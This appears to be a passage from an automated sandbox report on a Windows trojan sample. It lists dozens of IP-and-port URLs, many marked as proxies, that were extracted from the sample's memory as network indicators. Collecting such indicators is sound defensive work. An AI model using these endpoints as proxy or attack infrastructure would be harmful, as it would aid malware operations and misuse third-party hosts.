                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.65.240.157:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.65.30.37:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.65.30.37:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8341000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.65.59.95:5301
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.65.59.95:5301://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.72.59.99:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.72.59.99:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAB8C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.73.115.113:5000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CABE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.73.115.113:5000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.75.149.169:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.75.149.169:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.76.128.246:25383
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.76.128.246:25383://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8165000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.76.128.246:25395
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.76.128.246:25395://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.76.194.13:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.76.194.13:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.76.233.39:5302
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.76.233.39:5302://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.76.233.39:5302x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.77.237.93:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://27.77.237.93:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6948000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.10.93.50:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.10.93.50:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.112.35.208:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.112.35.208:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.12.178.169
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.12.178.169://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.12.178.169:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.122.84.99:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.122.84.99:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.123.150.192:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.123.150.192:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.127.62.252
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.127.62.252://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.127.62.252:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.128.142.113
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.128.142.113://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C773F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.128.142.113:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.143.37.255
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.143.37.255://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.143.37.255:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.24.178.81
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.24.178.81://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.24.178.81:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C691F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C667B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.24.58.156:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.24.58.156:3128://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.27.109.94:56781
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.27.109.94:56781://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.37.125.76:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.37.125.76:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD13000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CACD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.75.236.58:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CACD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.75.236.58:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.9.71.167:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.9.71.167:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.129.253.30:40223
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.129.253.30:40223://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA7BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.148.207.153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.148.207.153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.148.207.153:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.170.22.127:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.170.22.127:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.170.53.157
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.170.53.157://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.170.53.157:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.172.189.205:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.172.189.205:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.197.253.254:48678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.197.253.254:48678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.200.242.201:12196
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.200.242.201:12196://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.200.242.201:15755
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.200.242.201:15755://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.200.242.201:4531
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.200.242.201:4531://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.200.242.201:4531x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.200.242.201:9985
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.200.242.201:9985://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.207.38.66
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.207.38.66://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.207.38.66:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.209.96.173:51688
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.209.96.173:51688://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.142.115:8192
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.142.115:8192://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.158.245:5905
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.158.245:5905://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.158.247:5905
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.158.247:5905://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.214.171.62:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.214.171.62:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.217.221.74:8192
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.217.221.74:8192://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.22.7.188:56981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.22.7.188:56981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.223.22.21:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.223.22.21:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C91D2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:50687
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:50687://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:55276
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:55276://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:60419
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:60419://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.25.93.53
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.25.93.53://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.25.93.53:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.28.4.192
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.28.4.192://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.28.4.192:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8546000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.42.184.144:57752
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.42.184.144:57752://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.160
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.160://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.160:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.214
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.214://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.214:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80EB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.203.100:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.203.100:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.33.55:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBD32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.33.55:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.33.56:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.33.56:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.52.176:41890
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.52.176:41890://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.47.37.114:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.47.37.114:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.47.37.118:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.47.37.118:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://32.223.6.94
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://32.223.6.94://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.102.179.21
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.102.179.21://proxy
